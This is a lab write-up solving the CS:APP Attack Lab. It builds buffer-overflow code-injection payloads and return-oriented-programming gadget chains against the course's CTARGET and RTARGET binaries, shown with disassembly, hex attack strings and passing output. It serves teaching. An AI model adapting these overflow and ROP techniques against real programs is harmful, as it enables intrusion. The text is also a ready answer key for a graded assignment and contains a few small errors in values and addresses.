Introduction#
Experiment corresponding chapters: 3.10.3 & 3.10.4
Experiment content: Generate five different ways to attack two programs with security vulnerabilities
Experiment handout: http://csapp.cs.cmu.edu/3e/attacklab.pdf
Experiment gains:
- Learn about different attack methods for buffer overflow
- Learn how to write safer programs and what features operating systems and compilers provide to ensure program safety
- Understand the stack and parameter passing mechanism of x86-64 programs
- Familiarize with debugging tools like
GDB
andOBJDUMP
Foreword#
Our attack targets are the two vulnerable executable programs, CTARGET and RTARGET, both of which read strings from standard input. The function is defined as follows:
unsigned getbuf(){
char buf[BUFFER_SIZE];
Gets(buf);
return 1;
}
As we can see, the function allocates a space of size BUFFER_SIZE
on the stack. When the length of the input string exceeds this size, we can modify unexpected stack space, such as the return address, thus launching an attack.
Part I: Code Injection Attacks#
In the first three phases, we will use code injection to attack CTARGET. The stack position of this program remains consistent with each run, and the data on the stack can be viewed as executable code.
Level 1#
In phase one, we do not need to inject any instructions; we only need to modify the return address to redirect the program. The getbuf
function in CTARGET is called by the test
function:
void test() {
int val;
val = getbuf();
printf("No exploit. Getbuf returned 0x%x\n", val);
}
Normally, getbuf
will return to test
after execution and print the information, but we want to change this behavior to execute touch1
:
void touch1() {
vlevle = 1;
printf("Touch1!: You called touch1()\n");
validate(1);
exit(0);
}
Let's take a look at the assembly code of getbuf
:
00000000004017a8 <getbuf>:
4017a8: 48 83 ec 28 sub $0x28,%rsp
4017ac: 48 89 e7 mov %rsp,%rdi
4017af: e8 8c 02 00 00 call 401a40 <Gets>
4017b4: b8 01 00 00 00 mov $0x1,%eax
4017b9: 48 83 c4 28 add $0x28,%rsp
4017bd: c3 ret
4017be: 90 nop
4017bf: 90 nop
The following diagram shows the organization of the stack when getbuf
is executed. The program reduces the stack pointer by 0x28, allocating 40 bytes on the stack, with the character array buf
located at the top of the stack.
So we only need to input 40 bytes of blank characters, followed by 8 bytes of the target address to overwrite the original return address. By consulting the disassembled code, we find the address of the touch1
function:
00000000004017c0 <touch1>
Thus, our attack string is:
#phase1.txt
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
c0 17 40 00 00 00 00 00
Successfully cracked, executing with -q
can cancel communication with the CMU server.
❯ ./hex2raw < ./phase1/phase1.txt | ./ctarget -q
Cookie: 0x59b997fa
Type string:Touch1!: You called touch1()
Valid solution for level 1 with target ctarget
PASS: Would have posted the following:
user id bovik
course 15213-f15
lab attacklab
result 1:PASS:0xffffffff:ctarget:1:00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 C0 17 40 00 00 00 00 00
Level 2#
Phase two requires inserting a small amount of code into the attack string, with the goal of executing touch2
:
void touch2(unsigned val) {
vlevel = 2; /* Part of validation protocol */
if (val == cookie) {
printf("Touch2!: You called touch2(0x%.8x)\n", val);
validate(2);
} else {
printf("Misfire: You called touch2(0x%.8x)\n", val);
fail(2);
}
exit(0);
}
Compared to touch1
, touch2
has an additional unsigned parameter cookie
, the required value is in cookie.txt
, which is 0x59b997fa
.
Assembly:
00000000004017ec <touch2>:
4017ec: 48 83 ec 08 sub $0x8,%rsp
4017f0: 89 fa mov %edi,%edx
4017f2: c7 05 e0 2c 20 00 02 movl $0x2,0x202ce0(%rip) # 6044dc <vlevel>
4017f9: 00 00 00
4017fc: 3b 3d e2 2c 20 00 cmp 0x202ce2(%rip),%edi # 6044e4 <cookie>
401802: 75 20 jne 401824 <touch2+0x38>
401804: be e8 30 40 00 mov $0x4030e8,%esi
401809: bf 01 00 00 00 mov $0x1,%edi
40180e: b8 00 00 00 00 mov $0x0,%eax
401813: e8 d8 f5 ff ff call 400df0 <__printf_chk@plt>
401818: bf 02 00 00 00 mov $0x2,%edi
40181d: e8 6b 04 00 00 call 401c8d <validate>
401822: eb 1e jmp 401842 <touch2+0x56>
401824: be 10 31 40 00 mov $0x403110,%esi
401829: bf 01 00 00 00 mov $0x1,%edi
40182e: b8 00 00 00 00 mov $0x0,%eax
401833: e8 b8 f5 ff ff call 400df0 <__printf_chk@plt>
401838: bf 02 00 00 00 mov $0x2,%edi
40183d: e8 0d 05 00 00 call 401d4f <fail>
401842: bf 00 00 00 00 mov $0x0,%edi
401847: e8 f4 f5 ff ff call 400e40 <exit@plt>
The value of cookie
is passed in %rdi
, so the steps we need to execute are:
- Store
0x69b997fa
in%rdi
- Call
touch2
We can place the instructions for these two steps at the beginning of the attack string, and then change bytes 41-48 of the attack string to the address A, which is the lowest address of%rsp-0x28
ingetbuf
. This way, whengetbuf
returns, it will execute the above two steps at address A. The stack after loading the attack string is shown in the following diagram:
Now we get the actual value of A by usingGDB
to set a breakpoint after moving the stack pointer ingetbuf
and print the value of%rsp
:
❯ gdb ctarget
(gdb) b *0x4017af
(gdb) run -q
(gdb) p /x $rsp
$1 = 0x5561dc78
Then we obtain the machine code for the attack steps, first writing it in assembly form:
movq $0x59b997fa, %rdi # Store cookie in %rdi
pushq $0x4017ec # Jump to touch2
ret
Then use clang
to assemble and objdump
to disassemble:
❯ clang -c phase2.s & objdump -d phase2.o > phase2_dump.s
We get the following content:
0000000000000000 <.text>:
0: 48 c7 c7 fa 97 b9 59 mov $0x59b997fa,%rdi
7: 68 ec 17 40 00 push $0x4017ec
c: c3 ret
So we can get the attack string:
48 c7 c7 fa 97 b9 59 68
ec 17 40 00 c3 00 00 00 # Attack instructions
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
78 dc 61 55 00 00 00 00 # Address of attack instructions, i.e., A
Successfully cracked:
❯ ./hex2raw < ./phase2/phase2.txt | ./ctarget -q
Cookie: 0x59b997fa
Type string:Touch2!: You called touch2(0x59b997fa)
Valid solution for level 2 with target ctarget
PASS: Would have posted the following:
user id bovik
course 15213-f15
lab attacklab
result 1:PASS:0xffffffff:ctarget:2:48 C7 C7 FA 97 B9 59 68 EC 17 40 00 C3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 DC 61 55 00 00 00 00
Level 3#
Phase three is still a code injection attack. Compared to phase two, the unsigned number cookie
is now passed as a string. The target program to execute touch3
is as follows:
/* Compare string to hex representation of unsigned value */
int hexmatch(unsigned val, char *sval) {
char cbuf[110];
/* Make position of check string unpredictable */
char *s = cbuf + random() % 100;
sprintf(s, "%.8x", val);
return strncmp(sval, s, 9) == 0;
}
void touch3(char *sval) {
vlevel = 3; /* Part of validation protocol */
if (hexmatch(cookie, sval)) {
printf("Touch3!: You called touch3(\"%s\")\n", sval);
validate(3);
} else {
printf("Misfire: You called touch3(\"%s\")\n", sval);
fail(3);
}
exit(0);
}
The hexmatch
function compares the input string with cookie
. The overall idea is similar to phase two, but there are two points to note:
- The
cookie
is passed as a string and needs to be converted to ASCII code and stored on the stack. - When calling
getbuf
andhexmatch
, there will be four push operations beforestrcmp
, so we need to pay attention to the storage position of the string to avoid being overwritten.
The stack after inputting the attack string is as follows:
Write the attack instructions in assembly form:
movq $0x5561dca8, %rdi # Address where cookie string is stored (A+0x30)
pushq $0x4018fa # Address of touch3
ret
Assemble and disassemble to get the machine code:
0000000000000000 <.text>:
0: 48 c7 c7 a8 dc 61 55 mov $0x5561dca8,%rdi
7: 68 fa 18 40 00 push $0x4018fa
c: c3 ret
Construct the attack string:
48 c7 c7 a8 dc 61 55 68
fa 18 40 00 c3 00 00 00 # Attack instructions
00 00 00 00 00 00 00 00 <-|
00 00 00 00 00 00 00 00 | These four lines will be overwritten
00 00 00 00 00 00 00 00 |
78 dc 61 55 00 00 00 00 <-|- Address of attack instructions
35 39 62 39 39 37 66 61 # ASCII code of cookie
00 00 00 00 00 00 00 00 # \0
Successfully cracked:
❯ ./hex2raw < ./phase3/phase3.txt | ./ctarget -q
Cookie: 0x59b997fa
Type string:Touch3!: You called touch3("59b997fa")
Valid solution for level 3 with target ctarget
PASS: Would have posted the following:
user id bovik
course 15213-f15
lab attacklab
result 1:PASS:0xffffffff:ctarget:3:48 C7 C7 A8 DC 61 55 68 FA 18 40 00 C3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 DC 61 55 00 00 00 00 35 39 62 39 39 37 66 61 00 00 00 00 00 00 00 00
Part II: Return-Oriented Programming#
Using buffer overflow for code injection attacks is too dangerous, so people have used some techniques to defend against them. In the last two phases, we will attack RTARGET
, which uses the following two techniques:
- Stack randomization: The position of the stack changes with each run, making it impossible to attack the stack address of the string, i.e., the address A used above.
- Restricting executable code regions: Marking the contents saved in the stack as non-executable, so even if we can jump to the attack string, it will not run due to a segmentation fault.
Fortunately, some clever people have found a solution—Return-Oriented Programming (ROP).
The principle is to concatenate the code segments of the program itself to perform the attack. Each small part during concatenation is called a gadget, and each gadget contains several instructions and ends with0x3c
(the ret instruction).
Let’s look at an example, which is a snippet of C code from the RTARGET program:
void setval_210(unsigned *p) {
*p = 3347663060U;
}
And the corresponding assembly instructions:
0000000000400f15 <setval_210>:
400f15: c7 07 d4 48 89 c7 movl $0xc78948d4,(%rdi)
400f1b: c3 retq
The 48 49 c7
segment can be encoded as movq %rax, %rdi
, and c3
can be encoded as ret
. So if we jump to 0x400f118
, the functionality of this code is:
movq %rax, %rdi
ret
This is a gadget. Once we clarify the behavior of the attack, we can find suitable gadgets and combine them to form a code chain for the attack.
Level 2#
Phase four will use ROP to accomplish the same task as phase two, passing the cookie value to touch2
. We have broken it down into two steps:
- Store
0x69b997fa
in%rdi
- Call
touch2
At the same time, the problem requires using only the first eight registers (%rax-%rdi) and only using instructions betweenstart_farm
andmid_farm
as gadgets. After careful searching, we find that we can change the attack process to the following two gadgets:
popq %rax (58)
movq %rax %rdi (48 89 c7)
Determine the address of each gadget:
00000000004019ca <getval_280>:
4019ca: b8 29 58 90 c3 mov $0xc3905829,%eax
4019cf: c3 ret
00000000004019a0 <addval_273>:
4019a0: 8d 87 48 89 c7 c3 lea -0x3c3876b8(%rdi),%eax
4019a6: c3 ret
The addresses can be taken as 0x4019cc
and 0x4019a3
, where 90
encoded as nop
can be ignored, so our attack string can be:
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 # First 0x28 bytes
cc 19 40 00 00 00 00 00 # Return address, pointing to popq %rax
fa 97 b9 59 00 00 00 00 # Value to pop (cookie)
a2 19 40 00 00 00 00 00 # Pointing to movq
ec 17 40 00 00 00 00 00 # Pointing to touch2
Successfully cracked:
❯ ./hex2raw < ./phase4/phase4.txt | ./rtarget -q
Cookie: 0x59b997fa
Type string:Touch2!: You called touch2(0x59b997fa)
Valid solution for level 2 with target rtarget
PASS: Would have posted the following:
user id bovik
course 15213-f15
lab attacklab
result 1:PASS:0xffffffff:rtarget:2:00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 CC 19 40 00 00 00 00 00 FA 97 B9 59 00 00 00 00 A2 19 40 00 00 00 00 00 EC 17 40 00 00 00 00 00
Level 3#
In phase five, we will use ROP to crack the task of phase three, which is to pass the address of the cookie string to touch3
. Therefore, we need to know the value of %rsp
to calculate the address of the string. We find that there is a different function after mid_farm
:
00000000004019d6 <add_xy>:
4019d6: 48 8d 04 37 lea (%rdi,%rsi,1),%rax
4019da: c3 ret
Its function is to add %rdi
and %rsi
, so we can store the relative offset of %rsp
and the string address, allowing us to calculate the string address. The specific process is as follows:
1. movq %rsp %rdi
2. popq %rax # Pop the offset stored in the stack
3. movq %rax %rsi
4. movq %rax %rdi # Use the calculated result as a parameter
For step 1, we did not find a direct step, so we continue to break it down into two steps:
- movq %rsp %rax (48 89 e0)
- movq %rax %rdi (48 89 c7)
0000000000401a03 <addval_190>:
401a03: 8d 87 41 48 89 e0 lea -0x1f76b7bf(%rdi),%eax
401a09: c3 ret
00000000004019a0 <addval_273>:
4019a0: 8d 87 48 89 c7 c3 lea -0x3c3876b8(%rdi),%eax
4019a6: c3 ret
For step 2, popq %rax
encodes to 58
, we find:
00000000004019a7 <addval_219>:
4019a7: 8d 87 51 73 58 90 lea -0x6fa78caf(%rdi),%eax
4019ad: c3
For step 3, we also did not find a direct step, so we can only break it down into three steps:
- movq %eax %edx (89 c2)
- movq %edx %ecx (89 d1)
- movq %ecx %esi (89 ce)
We find the following gadgets:
00000000004019db <getval_481>:
4019db: b8 5c 89 c2 90 mov $0x90c2895c,%eax
4019e0: c3 ret
0000000000401a33 <getval_159>:
401a33: b8 89 d1 38 c9 mov $0xc938d189,%eax
401a38: c3
0000000000401a11 <addval_436>:
401a11: 8d 87 89 ce 90 90 lea -0x6f6f3177(%rdi),%eax
401a17: c3 ret
Note that 38 c9
is functionally equivalent to nop
, so we can ignore it. Therefore, our attack string can be:
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 # Keep empty
06 1a 40 00 00 00 00 00 # movq %rsp %rax
a2 19 40 00 00 00 00 00 # movq %rax %rdi <-- Get %rsp value
ab 19 40 00 00 00 00 00 # popq %rax
48 00 00 00 00 00 00 00 # Offset
dd 19 40 00 00 00 00 00 # movl %eax %edx
34 1a 40 00 00 00 00 00 # movl %edx %ecx
13 1a 40 00 00 00 00 00 # movl %ecx %esi
d6 19 40 00 00 00 00 00 # add_xy
a2 19 40 00 00 00 00 00 # movq %rax %rdi
fa 18 40 00 00 00 00 00 # touch3
35 39 62 39 39 37 66 61 # Cookie string
00 00 00 00 00 00 00 00
The cookie string is in the position of the %rsp
value, with an offset of 8*9=72=0x48
. Note that, like phase 3, do not place the cookie in lines 2 to 5 of the attack string, as it will be overwritten. The last question is also completed:
❯ ./hex2raw < ./phase5/phase5.txt | ./rtarget -q
Cookie: 0x59b997fa
Type string:Touch3!: You called touch3("59b997fa")
Valid solution for level 3 with target rtarget
PASS: Would have posted the following:
user id bovik
course 15213-f15
lab attacklab
result 1:PASS:0xffffffff:rtarget:3:00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 1A 40 00 00 00 00 00 A2 19 40 00 00 00 00 00 AB 19 40 00 00 00 00 00 48 00 00 00 00 00 00 00 DD 19 40 00 00 00 00 00 34 1A 40 00 00 00 00 00 13 1A 40 00 00 00 00 00 D6 19 40 00 00 00 00 00 A2 19 40 00 00 00 00 00 FA 18 40 00 00 00 00 00 35 39 62 39 39 37 66 61 00 00 00 00 00 00 00 00
Epilogue#
Since the above two methods (stack randomization and restricting executable code regions) cannot effectively defend against ROP, what other methods do we have? In fact, there is one: stack smashing detection. We find that stack smashing often occurs when exceeding the boundaries of local buffers, so we can store a special canary value between any local buffer in the stack frame and the stack state. This value is randomly generated during the program's execution, and before the function returns, the program checks whether the canary value has changed. If it has, the program aborts abnormally.
Recent versions of GCC will determine whether a function is susceptible to stack overflow attacks and automatically insert such overflow detection, resulting in minimal performance loss but with good effectiveness.